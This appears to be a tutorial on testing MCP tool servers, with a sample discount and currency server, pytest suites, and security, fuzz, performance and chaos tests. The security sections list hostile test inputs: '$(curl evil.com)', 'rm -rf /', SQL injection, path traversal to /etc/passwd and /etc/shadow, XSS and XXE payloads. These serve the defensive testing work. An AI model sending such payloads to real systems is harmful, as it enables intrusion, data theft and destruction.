| Threat | Attack Vector | Test Strategy |
|---|---|---|
| Prompt Injection | Malicious input in tool parameters | Inject commands in strings |
| Schema Poisoning | Manipulated tool schemas | Send malformed schemas |
| Data Exfiltration | Unauthorized data access | Test access controls |
| Privilege Escalation | Bypass authorization checks | Attempt restricted operations |
| DoS/Resource Exhaustion | Overwhelming requests | Send massive payloads |
Test if malicious input can manipulate server behavior:
def test_prompt_injection_attempts():
    """Test various prompt injection techniques"""
    injection_payloads = [
        # Command injection
        "; rm -rf /",
        "$(curl evil.com)",
        # SQL injection patterns
        "'; DROP TABLE users; --",
        "1' OR '1'='1",
        # Path traversal
        "../../../etc/passwd",
        "....//....//....//etc/passwd",
        # Script injection
        "<script>alert('XSS')</script>",
        "javascript:alert(1)",
        # Template injection
        "{{7*7}}",
        "${7*7}",
        # LDAP injection
        "*)(uid=*))(|(uid=*",
    ]

    for payload in injection_payloads:
        request = {
            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {
                "name": "search_files",
                "arguments": {"query": payload}
            }
        }
        response = client.send(request)

        # Server should handle safely - either sanitize or reject
        if "result" in response:
            # Check result doesn't contain an executed payload
            result_text = str(response["result"])
            assert "etc/passwd" not in result_text
            assert "DROP TABLE" not in result_text
        elif "error" in response:
            # Error is acceptable - server rejected dangerous input
            pass
        else:
            pytest.fail("Unexpected response format")
def test_malformed_payloads():
    """Test server's resilience to malformed requests"""

    def deeply_nested(depth: int) -> dict:
        """Build a pathologically nested params object."""
        payload = {"e": "..."}
        for _ in range(depth):
            payload = {"a": payload}
        return payload

    malformed_requests = [
        # Missing required fields
        {"jsonrpc": "2.0", "method": "tools/call"},
        # Wrong JSON-RPC version
        {"jsonrpc": "1.0", "id": 1, "method": "tools/call", "params": {}},
        # Invalid method name
        {"jsonrpc": "2.0", "id": 1, "method": "/../../../etc/passwd", "params": {}},
        # Oversized payload
        {"jsonrpc": "2.0", "id": 1, "method": "tools/call",
         "params": {"name": "test", "arguments": {"data": "X" * 10_000_000}}},
        # Deeply nested structure
        {"jsonrpc": "2.0", "id": 1, "method": "tools/call",
         "params": deeply_nested(1000)},
        # NULL bytes in the method name
        {"jsonrpc": "2.0", "id": 1, "method": "tools\x00/call", "params": {}},
    ]

    for malformed in malformed_requests:
        try:
            response = client.send(malformed)
            # Should return a proper error, not crash
            assert "error" in response
            assert response["error"]["code"] in [-32700, -32600, -32602]
        except Exception as e:
            # Connection errors are acceptable (server protecting itself)
            print(f"Server rejected malformed request: {e}")
import random
import string

def test_input_fuzzing():
    """Fuzz test tool inputs"""

    def generate_fuzz_string(length):
        """Generate random fuzz input"""
        chars = string.printable + "".join(chr(i) for i in range(128, 256))
        return "".join(random.choice(chars) for _ in range(length))

    fuzz_cases = [
        # Random strings
        generate_fuzz_string(100),
        generate_fuzz_string(1000),
        # Unicode edge cases
        "\u0000" * 100,   # NULL bytes
        "\uffff" * 100,   # max BMP code point
        "🔥" * 100,       # emoji
        # Format strings
        "%s" * 100,
        "%n" * 100,
        # Boundary integers
        2**31 - 1,        # max int32
        2**63 - 1,        # max int64
        -2**63,           # min int64
    ]

    for fuzz_input in fuzz_cases:
        request = {
            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {
                "name": "process_text",
                "arguments": {"text": fuzz_input}
            }
        }
        try:
            response = client.send(request)
            # Server should handle gracefully - not crash
            assert "result" in response or "error" in response
        except Exception as e:
            # Network errors are acceptable if server self-protects
            print(f"Fuzz input caused: {e}")
Test Case: Unauthorized Tool Access
Given: User has permission for the "read_data" tool only
When: User attempts to call the "delete_data" tool
Then: Server returns a 403 Forbidden error

Test Case: Token Validation
Given: A valid authentication token is required
When: Request is sent without a token
Then: Server rejects with an authentication error

Test Case: Expired Token
Given: Token expired 1 hour ago
When: Request is sent with the expired token
Then: Server rejects and requests re-authentication

Test Case: Token Tampering
Given: Valid token signature
When: Token payload is modified
Then: Server detects tampering and rejects
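The token cases can be prototyped without a real identity provider. Below is a minimal HMAC-signed token sketch; the token format, `SECRET`, and helper names are ours, purely for illustration (production servers should use a vetted library and a standard format such as JWT):

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = b"test-secret"  # hypothetical shared secret for this sketch

def sign(payload: dict) -> str:
    """Issue a token: base64(payload) + '.' + HMAC-SHA256 signature."""
    body = base64.urlsafe_b64encode(json.dumps(payload).encode())
    sig = hmac.new(SECRET, body, hashlib.sha256).hexdigest()
    return body.decode() + "." + sig

def verify(token: str, now: float) -> bool:
    """Reject malformed, tampered, or expired tokens."""
    try:
        body_b64, sig = token.rsplit(".", 1)
    except ValueError:
        return False  # malformed token
    expected = hmac.new(SECRET, body_b64.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):
        return False  # tampered payload or signature
    payload = json.loads(base64.urlsafe_b64decode(body_b64))
    return payload.get("exp", 0) > now  # expired tokens fail

# Token Validation: a valid, unexpired token verifies
good = sign({"sub": "tester", "exp": time.time() + 3600})
assert verify(good, time.time())

# Expired Token: exp in the past is rejected
expired = sign({"sub": "tester", "exp": time.time() - 3600})
assert not verify(expired, time.time())

# Token Tampering: flipping one signature character is detected
tampered = good[:-1] + ("0" if good[-1] != "0" else "1")
assert not verify(tampered, time.time())
```

Each assertion maps directly onto one of the Given/When/Then cases above, so the same fixtures can later be pointed at a live server.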
def test_data_sanitization():
    """Test that server sanitizes dangerous data"""
    test_cases = [
        {
            "name": "HTML Injection",
            "input": "<img src=x onerror=alert('XSS')>",
            "should_not_contain": ["<img", "onerror", "alert"]
        },
        {
            "name": "LDAP Injection",
            "input": "admin*",
            "should_not_contain": ["*"]  # wildcards should be escaped
        },
        {
            "name": "XML Injection",
            "input": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>",
            "should_not_contain": ["<!ENTITY", "SYSTEM"]
        }
    ]

    for test in test_cases:
        response = client.call_tool("process_input", {"data": test["input"]})
        result_text = json.dumps(response)
        for dangerous_string in test["should_not_contain"]:
            assert dangerous_string not in result_text, \
                f"{test['name']}: Dangerous string '{dangerous_string}' not sanitized"
// 1. Path Traversal Attempt
{
"name": "read_file",
"arguments": {
"path": "../../../../etc/shadow"
}
}
// 2. Command Injection
{
"name": "execute_command",
"arguments": {
"command": "ls; cat /etc/passwd"
}
}
// 3. SQL Injection
{
"name": "search_users",
"arguments": {
"query": "' OR '1'='1' --"
}
}
// 4. Buffer Overflow Attempt
{
"name": "process_data",
"arguments": {
"data": "A" * 1000000
}
}
// 5. Resource Exhaustion
{
"name": "calculate",
"arguments": {
"iterations": 999999999999
}
}
Scenario: Your MCP server has a "database_query" tool that executes SQL queries.
Task: Design 5 security tests covering:
We're going to build and test a real MCP server with two tools:
mcp-discount-server/
├── src/
│   ├── server.py            # Main MCP server
│   ├── tools/
│   │   ├── __init__.py
│   │   ├── discount.py      # Discount calculator tool
│   │   └── currency.py      # Currency converter tool
│   └── config.py            # Configuration
├── tests/
│   ├── __init__.py
│   ├── test_server.py       # Server tests
│   ├── test_discount.py     # Discount tool tests
│   ├── test_currency.py     # Currency tool tests
│   ├── test_contract.py     # Contract tests
│   ├── test_performance.py  # Performance tests
│   └── test_security.py     # Security tests
├── requirements.txt
├── pytest.ini
└── README.md
# requirements.txt
mcp>=0.1.0
pytest>=7.4.0
pytest-asyncio>=0.21.0
jsonschema>=4.19.0
aiohttp>=3.8.0
requests>=2.31.0
"""
MCP Discount & Currency Server

A sample MCP server demonstrating tool implementation and testing
"""
from mcp.server import Server
from mcp.types import Tool, TextContent
import json

# Import our tools
from tools.discount import calculate_discount
from tools.currency import convert_currency

# Initialize MCP server
server = Server("discount-currency-server")


@server.list_tools()
async def list_tools() -> list[Tool]:
    """
    List all available tools.

    This is called during capability negotiation.
    """
    return [
        Tool(
            name="calculate_discount",
            description="Calculate discounted price based on original price and discount percentage",
            inputSchema={
                "type": "object",
                "properties": {
                    "original_price": {
                        "type": "number",
                        "description": "Original price before discount",
                        "minimum": 0
                    },
                    "discount_percent": {
                        "type": "number",
                        "description": "Discount percentage (0-100)",
                        "minimum": 0,
                        "maximum": 100
                    }
                },
                "required": ["original_price", "discount_percent"]
            }
        ),
        Tool(
            name="currency_converter",
            description="Convert amount from one currency to another",
            inputSchema={
                "type": "object",
                "properties": {
                    "amount": {
                        "type": "number",
                        "description": "Amount to convert",
                        "minimum": 0
                    },
                    "from_currency": {
                        "type": "string",
                        "description": "Source currency code (e.g., USD)",
                        "pattern": "^[A-Z]{3}$"
                    },
                    "to_currency": {
                        "type": "string",
                        "description": "Target currency code (e.g., EUR)",
                        "pattern": "^[A-Z]{3}$"
                    }
                },
                "required": ["amount", "from_currency", "to_currency"]
            }
        )
    ]


@server.call_tool()
async def call_tool(name: str, arguments: dict) -> list[TextContent]:
    """Execute a tool with given arguments."""
    # Route to the appropriate tool handler
    if name == "calculate_discount":
        result = calculate_discount(
            arguments["original_price"],
            arguments["discount_percent"]
        )
        return [TextContent(type="text", text=result)]
    elif name == "currency_converter":
        result = convert_currency(
            arguments["amount"],
            arguments["from_currency"],
            arguments["to_currency"]
        )
        return [TextContent(type="text", text=result)]
    else:
        raise ValueError(f"Unknown tool: {name}")


async def main():
    """Start the MCP server over stdio."""
    from mcp.server.stdio import stdio_server
    async with stdio_server() as (read_stream, write_stream):
        await server.run(
            read_stream,
            write_stream,
            server.create_initialization_options()
        )


if __name__ == "__main__":
    import asyncio
    asyncio.run(main())
"""
Discount calculation tool
"""


def calculate_discount(original_price: float, discount_percent: float) -> str:
    """
    Calculate discounted price.

    Args:
        original_price: Original price before discount
        discount_percent: Discount percentage (0-100)

    Returns:
        Formatted string with discounted price

    Raises:
        ValueError: If inputs are invalid
    """
    # Input validation
    if original_price < 0:
        raise ValueError("Original price cannot be negative")
    if discount_percent < 0 or discount_percent > 100:
        raise ValueError("Discount percent must be between 0 and 100")

    # Calculate discount
    discount_amount = original_price * (discount_percent / 100)
    final_price = original_price - discount_amount

    # Format response
    return (
        f"Discounted price: ${final_price:.2f} "
        f"({discount_percent}% off ${original_price:.2f})"
    )
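Before wiring this into the MCP layer, it is worth a quick standalone smoke check of the business logic. The snippet below simply calls the function directly (re-stated here so it runs on its own, without the package layout):

```python
# Standalone smoke check for the discount logic
# (function copied from above so this snippet is self-contained).
def calculate_discount(original_price: float, discount_percent: float) -> str:
    if original_price < 0:
        raise ValueError("Original price cannot be negative")
    if discount_percent < 0 or discount_percent > 100:
        raise ValueError("Discount percent must be between 0 and 100")
    final_price = original_price - original_price * (discount_percent / 100)
    return (f"Discounted price: ${final_price:.2f} "
            f"({discount_percent}% off ${original_price:.2f})")

print(calculate_discount(100.00, 20))  # Discounted price: $80.00 (20% off $100.00)

try:
    calculate_discount(-1, 20)
except ValueError as exc:
    print(exc)  # Original price cannot be negative
```

Running the happy path and one rejection path by hand like this catches obvious mistakes before any protocol plumbing gets involved.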
"""
Currency conversion tool

Note: Uses mock exchange rates for demo purposes
"""

# Mock exchange rates (relative to USD)
EXCHANGE_RATES = {
    "USD": 1.0,
    "EUR": 0.85,
    "GBP": 0.73,
    "JPY": 110.0,
    "CAD": 1.25,
    "AUD": 1.35,
}


def convert_currency(amount: float, from_currency: str, to_currency: str) -> str:
    """
    Convert amount between currencies.

    Args:
        amount: Amount to convert
        from_currency: Source currency code (e.g., "USD")
        to_currency: Target currency code (e.g., "EUR")

    Returns:
        Formatted string with converted amount

    Raises:
        ValueError: If currency codes are invalid
    """
    # Input validation
    if amount < 0:
        raise ValueError("Amount cannot be negative")
    if from_currency not in EXCHANGE_RATES:
        raise ValueError(f"Unsupported currency: {from_currency}")
    if to_currency not in EXCHANGE_RATES:
        raise ValueError(f"Unsupported currency: {to_currency}")

    # Convert to USD first, then to the target currency
    amount_in_usd = amount / EXCHANGE_RATES[from_currency]
    converted_amount = amount_in_usd * EXCHANGE_RATES[to_currency]

    # Format response
    return (
        f"{amount:.2f} {from_currency} = "
        f"{converted_amount:.2f} {to_currency}"
    )
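A useful property check for any converter: converting from A to B and back to A should recover the original amount, up to floating-point noise. Here is a standalone sketch against the same mock rate table (only the numeric core is re-stated, so the snippet runs on its own):

```python
# Round-trip property check for the mock exchange rates (table copied from above).
EXCHANGE_RATES = {
    "USD": 1.0, "EUR": 0.85, "GBP": 0.73,
    "JPY": 110.0, "CAD": 1.25, "AUD": 1.35,
}

def convert(amount: float, from_currency: str, to_currency: str) -> float:
    """Numeric core of convert_currency: go through USD as the pivot."""
    usd = amount / EXCHANGE_RATES[from_currency]
    return usd * EXCHANGE_RATES[to_currency]

for code in EXCHANGE_RATES:
    round_trip = convert(convert(100.0, "USD", code), code, "USD")
    assert abs(round_trip - 100.0) < 1e-9, code

print("round-trip OK")
```

Property checks like this scale better than hand-picked expected values: one loop covers every currency pair through the pivot.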
You now have a working MCP server! In the next sections, we'll write comprehensive tests for it.
Before automating tests, let's manually verify the server works correctly.
$ cd mcp-discount-server
$ python src/server.py
{
"jsonrpc": "2.0",
"id": 1,
"method": "tools/list"
}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"tools": [
  {
    "name": "calculate_discount",
    "description": "Calculate discounted price...",
    "inputSchema": { /* schema */ }
  },
  {
    "name": "currency_converter",
    "description": "Convert amount...",
    "inputSchema": { /* schema */ }
  }
]
}
}
// Request
{
"jsonrpc": "2.0",
"id": 2,
"method": "tools/call",
"params": {
"name": "calculate_discount",
"arguments": {
"original_price": 100.00,
"discount_percent": 20
}
}
}
// Expected Response
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"content": [ {
"type": "text",
"text": "Discounted price: $80.00 (20% off $100.00)"
}
]
}
}
// Request
{
"jsonrpc": "2.0",
"id": 3,
"method": "tools/call",
"params": {
"name": "calculate_discount",
"arguments": {
"original_price": 100.00,
"discount_percent": 150
}
}
}
// Expected Response
{
"jsonrpc": "2.0",
"id": 3,
"error": {
"code": -32602,
"message": "Invalid params",
"data": {
"details": "Discount percent must be between 0 and 100"
}
}
}
// Request
{
"jsonrpc": "2.0",
"id": 4,
"method": "tools/call",
"params": {
"name": "currency_converter",
"arguments": {
"amount": 100.00,
"from_currency": "USD",
"to_currency": "EUR"
}
}
}
// Expected Response
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"content": [ {
"type": "text",
"text": "100.00 USD = 85.00 EUR"
}
]
}
}
// Request
{
"jsonrpc": "2.0",
"id": 5,
"method": "tools/call",
"params": {
"name": "currency_converter",
"arguments": {
"amount": 100.00,
"from_currency": "USD",
"to_currency": "XYZ" // Invalid currency
}
}
}
// Expected Response
{
"jsonrpc": "2.0",
"id": 5,
"error": {
"code": -32602,
"message": "Invalid params",
"data": {
"details": "Unsupported currency: XYZ"
}
}
}
| Test | Status | Notes |
|---|---|---|
| Server starts successfully | Pass / Fail | |
| Tools/list returns 2 tools | Pass / Fail | |
| Discount: Valid input works | Pass / Fail | |
| Discount: Negative price fails | Pass / Fail | |
| Discount: >100% fails | Pass / Fail | |
| Currency: Valid conversion works | Pass / Fail | |
| Currency: Invalid code fails | Pass / Fail | |
| Non-existent tool returns error | Pass / Fail | |
Task: Manually test the following scenarios and document results:
For each test, record: input, expected output, actual output, pass/fail
Now let's automate our tests using Pytest.
[pytest]
testpaths = tests
python_files = test_*.py
python_classes = Test*
python_functions = test_*
asyncio_mode = auto
markers =
    unit: Unit tests
    integration: Integration tests
    security: Security tests
    performance: Performance tests
"""
Pytest fixtures for MCP server testing
"""
import asyncio

import pytest
from mcp.client import Client


@pytest.fixture
async def mcp_client():
    """Create an MCP client connected to the test server."""
    client = Client()
    await client.connect()
    yield client
    await client.disconnect()


@pytest.fixture
def sample_discount_params():
    """Sample valid parameters for the discount tool."""
    return {
        "original_price": 100.00,
        "discount_percent": 20
    }


@pytest.fixture
def sample_currency_params():
    """Sample valid parameters for the currency tool."""
    return {
        "amount": 100.00,
        "from_currency": "USD",
        "to_currency": "EUR"
    }
"""
Functional tests for the discount calculator tool
"""
import pytest


@pytest.mark.unit
async def test_calculate_discount_valid_input(mcp_client, sample_discount_params):
    """Test discount calculation with valid inputs."""
    result = await mcp_client.call_tool("calculate_discount", sample_discount_params)
    assert "result" in result
    assert "Discounted price: $80.00" in result["result"]["content"][0]["text"]


@pytest.mark.unit
async def test_calculate_discount_zero_percent(mcp_client):
    """Test with 0% discount."""
    result = await mcp_client.call_tool("calculate_discount", {
        "original_price": 100.00,
        "discount_percent": 0
    })
    assert "Discounted price: $100.00" in result["result"]["content"][0]["text"]


@pytest.mark.unit
async def test_calculate_discount_hundred_percent(mcp_client):
    """Test with 100% discount."""
    result = await mcp_client.call_tool("calculate_discount", {
        "original_price": 100.00,
        "discount_percent": 100
    })
    assert "Discounted price: $0.00" in result["result"]["content"][0]["text"]


@pytest.mark.unit
async def test_calculate_discount_negative_price(mcp_client):
    """Test that a negative price returns an error."""
    with pytest.raises(ValueError, match="cannot be negative"):
        await mcp_client.call_tool("calculate_discount", {
            "original_price": -50.00,
            "discount_percent": 20
        })


@pytest.mark.unit
async def test_calculate_discount_invalid_percent(mcp_client):
    """Test that a discount > 100 returns an error."""
    with pytest.raises(ValueError, match="must be between 0 and 100"):
        await mcp_client.call_tool("calculate_discount", {
            "original_price": 100.00,
            "discount_percent": 150
        })


@pytest.mark.unit
async def test_calculate_discount_missing_field(mcp_client):
    """Test that a missing required field returns an error."""
    with pytest.raises(Exception):  # Should be a validation error
        await mcp_client.call_tool("calculate_discount", {
            "original_price": 100.00
            # Missing discount_percent
        })


@pytest.mark.unit
@pytest.mark.parametrize("price,discount,expected", [
    (100, 10, "$90.00"),
    (50.50, 25, "$37.88"),
    (999.99, 33, "$669.99"),
    (0.01, 50, "$0.01"),
])
async def test_calculate_discount_parametrized(mcp_client, price, discount, expected):
    """Test multiple discount scenarios."""
    result = await mcp_client.call_tool("calculate_discount", {
        "original_price": price,
        "discount_percent": discount
    })
    assert expected in result["result"]["content"][0]["text"]
"""
Contract tests for the MCP server
"""
import jsonschema
import pytest


@pytest.mark.integration
async def test_tools_list_contract(mcp_client):
    """Verify the tools/list response matches the contract."""
    expected_schema = {
        "type": "object",
        "properties": {
            "tools": {
                "type": "array",
                "minItems": 2,
                "items": {
                    "type": "object",
                    "properties": {
                        "name": {"type": "string"},
                        "description": {"type": "string"},
                        "inputSchema": {"type": "object"}
                    },
                    "required": ["name", "inputSchema"]
                }
            }
        },
        "required": ["tools"]
    }
    result = await mcp_client.list_tools()
    jsonschema.validate(result, expected_schema)


@pytest.mark.integration
async def test_tool_response_structure(mcp_client):
    """Verify the tool call response structure."""
    result = await mcp_client.call_tool("calculate_discount", {
        "original_price": 100,
        "discount_percent": 20
    })

    # Check JSON-RPC structure
    assert "jsonrpc" in result
    assert result["jsonrpc"] == "2.0"
    assert "id" in result
    assert "result" in result

    # Check result structure
    assert "content" in result["result"]
    assert isinstance(result["result"]["content"], list)
    assert len(result["result"]["content"]) > 0
    assert result["result"]["content"][0]["type"] == "text"
    assert "text" in result["result"]["content"][0]
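It helps to see what a contract violation actually produces. `jsonschema.validate` raises a `ValidationError` with a readable message; here is a minimal demonstration against a stripped-down version of the schema above:

```python
import jsonschema

schema = {
    "type": "object",
    "properties": {"tools": {"type": "array"}},
    "required": ["tools"],
}

# A conforming payload validates silently
jsonschema.validate({"tools": []}, schema)

# A payload missing a required key raises ValidationError
try:
    jsonschema.validate({}, schema)
except jsonschema.ValidationError as exc:
    print(exc.message)  # 'tools' is a required property
```

In CI, that exception message lands directly in the test failure output, which makes contract regressions easy to diagnose.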
"""
Performance tests for the MCP server
"""
import asyncio
import time

import numpy as np
import pytest


@pytest.mark.performance
async def test_response_time(mcp_client):
    """Test that response time is under 100ms."""
    start = time.time()
    await mcp_client.call_tool("calculate_discount", {
        "original_price": 100,
        "discount_percent": 20
    })
    end = time.time()

    response_time = (end - start) * 1000  # Convert to ms
    assert response_time < 100, f"Response time {response_time}ms exceeds 100ms"


@pytest.mark.performance
async def test_concurrent_requests(mcp_client):
    """Test the server handles 10 concurrent requests."""
    async def make_request():
        return await mcp_client.call_tool("calculate_discount", {
            "original_price": 100,
            "discount_percent": 20
        })

    # Execute 10 concurrent requests
    tasks = [make_request() for _ in range(10)]
    results = await asyncio.gather(*tasks)

    # Verify all succeeded
    assert len(results) == 10
    for result in results:
        assert "result" in result


@pytest.mark.performance
async def test_latency_percentiles(mcp_client):
    """Measure p50, p95, and p99 latency."""
    latencies = []
    for _ in range(100):
        start = time.time()
        await mcp_client.call_tool("calculate_discount", {
            "original_price": 100,
            "discount_percent": 20
        })
        end = time.time()
        latencies.append((end - start) * 1000)

    p50 = np.percentile(latencies, 50)
    p95 = np.percentile(latencies, 95)
    p99 = np.percentile(latencies, 99)

    print("\nLatency percentiles:")
    print(f"  p50: {p50:.2f}ms")
    print(f"  p95: {p95:.2f}ms")
    print(f"  p99: {p99:.2f}ms")

    assert p95 < 100, f"p95 latency {p95}ms exceeds target"
    assert p99 < 500, f"p99 latency {p99}ms exceeds target"
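The percentile math does not require numpy. If you would rather avoid the dependency, the standard library's `statistics.quantiles` with `method="inclusive"` matches `np.percentile`'s default linear interpolation:

```python
import statistics

latencies = list(range(1, 101))  # pretend these are 100 measured latencies, in ms

# n=100 yields 99 cut points; index i-1 is the i-th percentile
cuts = statistics.quantiles(latencies, n=100, method="inclusive")
p50, p95, p99 = cuts[49], cuts[94], cuts[98]
print(f"p50={p50:.2f}ms  p95={p95:.2f}ms  p99={p99:.2f}ms")
# p50=50.50ms  p95=95.05ms  p99=99.01ms
```

Note that the default `method="exclusive"` uses a different interpolation and would give slightly different numbers, so pin the method if you compare against numpy-based baselines.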
"""
Security tests for the MCP server
"""
import pytest


@pytest.mark.security
async def test_sql_injection_in_params(mcp_client):
    """Test that SQL injection attempts are handled safely."""
    sql_injections = [
        "'; DROP TABLE users; --",
        "1' OR '1'='1",
        "admin' --",
    ]
    for injection in sql_injections:
        # Should handle gracefully: either reject or sanitize
        try:
            result = await mcp_client.call_tool("calculate_discount", {
                "original_price": injection,
                "discount_percent": 20
            })
            # If it succeeds, check the result doesn't echo the injection
            assert "DROP TABLE" not in str(result)
        except Exception:
            # An error is acceptable: the server rejected malicious input
            pass


@pytest.mark.security
async def test_large_payload(mcp_client):
    """Test the server handles large payloads safely."""
    large_value = "X" * 1_000_000
    with pytest.raises(Exception):  # Should reject or time out
        await mcp_client.call_tool("calculate_discount", {
            "original_price": large_value,
            "discount_percent": 20
        })
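Hand-maintained payload lists go stale quickly. A small seeded generator (a sketch; extend the classics list for your own threat model) broadens coverage while keeping runs reproducible:

```python
import random
import string

CLASSIC_PAYLOADS = [
    "'; DROP TABLE users; --",      # SQL injection
    "../../../etc/passwd",          # path traversal
    "<script>alert(1)</script>",    # XSS-style markup
    "A" * 10_000,                   # oversized input
]

def hostile_strings(seed: int = 0, n_random: int = 5) -> list[str]:
    """Classic attack payloads plus seeded random junk for fuzzing tool inputs."""
    rng = random.Random(seed)
    junk = [
        "".join(rng.choices(string.printable, k=rng.randint(1, 64)))
        for _ in range(n_random)
    ]
    return CLASSIC_PAYLOADS + junk

payloads = hostile_strings()
print(len(payloads))  # 9
```

Because the generator is seeded, a failure found in CI can be reproduced locally with the same seed, which is essential for debugging fuzz-style tests.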
# Run all tests
$ pytest

# Run a specific test file
$ pytest tests/test_discount.py

# Run tests by marker
$ pytest -m unit
$ pytest -m security

# Run with verbose output
$ pytest -v

# Run with coverage
$ pytest --cov=src --cov-report=html
Task: Write test cases for the currency_converter tool covering:
Use the discount tests as a template!
Production MCP servers need comprehensive observability: logs, metrics, and traces.
import json
import logging
from datetime import datetime

# Structured logging for the MCP server
logger = logging.getLogger("mcp_server")


def log_tool_call(tool_name: str, params: dict, duration_ms: float, success: bool):
    """Log structured tool call data."""
    log_entry = {
        "timestamp": datetime.utcnow().isoformat(),
        "event": "tool_call",
        "tool": tool_name,
        "params": params,
        "duration_ms": duration_ms,
        "success": success
    }
    logger.info(json.dumps(log_entry))
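Rather than calling `log_tool_call` by hand in every handler, a decorator guarantees the entry is always emitted, including on failure. Here is a sketch (`print` stands in for `logger.info` so the snippet runs standalone):

```python
import functools
import json
import time
from datetime import datetime, timezone

def logged_tool(func):
    """Emit one structured log entry per call, whether it succeeds or raises."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        start = time.perf_counter()
        success = True
        try:
            return func(*args, **kwargs)
        except Exception:
            success = False
            raise
        finally:
            entry = {
                "timestamp": datetime.now(timezone.utc).isoformat(),
                "event": "tool_call",
                "tool": func.__name__,
                "duration_ms": round((time.perf_counter() - start) * 1000, 3),
                "success": success,
            }
            print(json.dumps(entry))  # stand-in for logger.info
    return wrapper

@logged_tool
def calculate_discount(original_price, discount_percent):
    return original_price * (1 - discount_percent / 100)

calculate_discount(100, 20)  # emits one JSON log line, then returns 80.0
```

The `finally` block is the point: even an exception in the handler still produces a log record with `"success": false`, which is exactly the data you need when debugging production incidents.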
from prometheus_client import Counter, Histogram

# Define metrics
tool_calls_total = Counter(
    'mcp_tool_calls_total',
    'Total tool calls',
    ['tool_name', 'status']
)
tool_duration_seconds = Histogram(
    'mcp_tool_duration_seconds',
    'Tool execution duration',
    ['tool_name']
)

# Use in code
tool_calls_total.labels(tool_name="calculate_discount", status="success").inc()
tool_duration_seconds.labels(tool_name="calculate_discount").observe(0.05)
# .github/workflows/test.yml
name: MCP Server Tests

on: [push, pull_request]

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Set up Python
        uses: actions/setup-python@v2
        with:
          python-version: '3.11'
      - name: Install dependencies
        run: |
          pip install -r requirements.txt
          pip install pytest pytest-cov
      - name: Run unit tests
        run: pytest -m unit --cov=src
      - name: Run integration tests
        run: pytest -m integration
      - name: Run security tests
        run: pytest -m security
      - name: Check coverage
        run: pytest --cov=src --cov-fail-under=80
      - name: Contract tests (breaking change detection)
        run: pytest tests/test_contract.py --strict
Test server resilience under failure conditions:
import asyncio

import pytest


@pytest.mark.chaos
async def test_server_restart_resilience(mcp_client):
    """Test the client handles a server restart."""
    # Make initial call
    result1 = await mcp_client.call_tool("calculate_discount", {...})
    assert "result" in result1

    # Simulate server restart
    await server.restart()
    await asyncio.sleep(1)

    # Reconnect and retry
    await mcp_client.reconnect()
    result2 = await mcp_client.call_tool("calculate_discount", {...})
    assert "result" in result2


@pytest.mark.chaos
async def test_network_partition(mcp_client):
    """Test behavior during network issues."""
    # Inject network delay
    with network_delay(500):  # 500ms delay
        result = await mcp_client.call_tool("calculate_discount", {...})
        # Should still succeed, but more slowly


@pytest.mark.chaos
async def test_resource_exhaustion(mcp_client):
    """Test the server under resource pressure."""
    # Fill server memory
    with high_memory_pressure():
        # The server should still respond
        result = await mcp_client.call_tool("calculate_discount", {...})
        assert "result" in result or "error" in result
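The `network_delay` and `high_memory_pressure` helpers above are pseudocode, not a real library. For locally injected latency, one minimal approach is to wrap the client call in an async shim that sleeps first (a hypothetical sketch; realistic network chaos is better done with a proxy or `tc netem`):

```python
import asyncio
import time

def add_latency(async_fn, delay_ms: int):
    """Wrap an async callable so every invocation pays an extra fixed delay."""
    async def delayed(*args, **kwargs):
        await asyncio.sleep(delay_ms / 1000)
        return await async_fn(*args, **kwargs)
    return delayed

# Demo against a trivial coroutine standing in for mcp_client.call_tool
async def fake_call_tool(name, arguments):
    return {"result": {"content": [{"type": "text", "text": "ok"}]}}

async def main():
    slow_call = add_latency(fake_call_tool, 50)
    start = time.perf_counter()
    result = await slow_call("calculate_discount", {})
    elapsed_ms = (time.perf_counter() - start) * 1000
    assert elapsed_ms >= 50   # the injected delay was actually paid
    assert "result" in result

asyncio.run(main())
```

Because the shim wraps any async callable, the same trick works for timeouts and retry testing: swap the sleep for a raised `asyncio.TimeoutError` to simulate a dropped connection.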
def test_backward_compatibility():
    """Test a new server version with an old client."""
    # V1 client
    v1_client = MCPClient(protocol_version="1.0")

    # V2 server (with new optional fields)
    v2_server = MCPServer(protocol_version="2.0")

    # The V1 client should still work with the V2 server
    result = v1_client.call_tool("calculate_discount", {
        "original_price": 100,
        "discount_percent": 20
    })  # Not using new V2 fields
    assert "result" in result
Advanced testing goes beyond functional validation. Focus on observability, automation, resilience, and maintaining compatibility as your system evolves.
Test your understanding of MCP server testing. Select the best answer for each question.